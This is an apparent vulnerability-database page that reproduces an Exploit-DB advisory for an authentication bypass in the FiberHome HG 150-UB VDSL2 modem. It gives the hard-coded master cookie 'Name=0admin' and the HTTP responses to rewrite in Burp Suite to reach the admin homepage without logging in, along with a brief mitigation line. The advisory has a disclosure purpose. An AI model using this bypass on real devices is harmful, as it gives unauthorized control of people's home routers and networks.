FiberHome VDSL2 Modem HG 150-UB Authentication Bypass

vendor:

HG 150-UB

by:

Noman Riffat

9.8

CVSS

CRITICAL

Authentication Bypass

287

CWE

Product Name: HG 150-UB

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: CVE-2018-9248, CVE-2018-9248

CPE: h:fiberhome:hg_150-ub

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2018

FiberHome VDSL2 Modem HG 150-UB Authentication Bypass

The vulnerability exists in plain text & hard coded cookie. Using any cookie manager extension, an attacker can bypass login page by setting the following Master Cookie. Cookie: Name=0admin. Then access the homepage which will no longer require authentication. Due to improper session implementation, there is another way to bypass login. The response header of homepage without authentication looks like this. HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Set-Cookie: Name=; path=/ Content-Type: text/html Connection: close <html><head><script language='javascript'> parent.location='login.html' </script></head><body></body></html>HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Content-Type: text/html Connection: close <html> <head>.. continue to actual homepage source. The response header looks totally messed up and by triggering burp suite and modifying it to following will grant access to homepage without authentication. HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Set-Cookie: Name=; path=/ Content-Type: text/html Connection: close <html> <head>.. continue to actual homepage source.

Mitigation:

Ensure that authentication is properly implemented and that cookies are not hard coded.

Source

Exploit-DB raw data:

# Exploit Title: FiberHome VDSL2 Modem HG 150-UB Authentication Bypass
# Date: 04/03/2018
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.fiberhome.com/
# CVE : CVE-2018-9248, CVE-2018-9248

The vulnerability exists in plain text & hard coded cookie. Using any
cookie manager extension, an attacker can bypass login page by setting the
following Master Cookie.

Cookie: Name=0admin

Then access the homepage which will no longer require authentication.
http://192.168.10.1/

Due to improper session implementation, there is another way to bypass
login. The response header of homepage without authentication looks like
this.

HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close

<html><head><script language='javascript'>
parent.location='login.html'
</script></head><body></body></html>HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Content-Type: text/html
Connection: close

<html>
<head>
.. continue to actual homepage source

The response header looks totally messed up and by triggering burp suite
and modifying it to following will grant access to homepage without
authentication.

HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close

<html>
<head>
.. continue to actual homepage source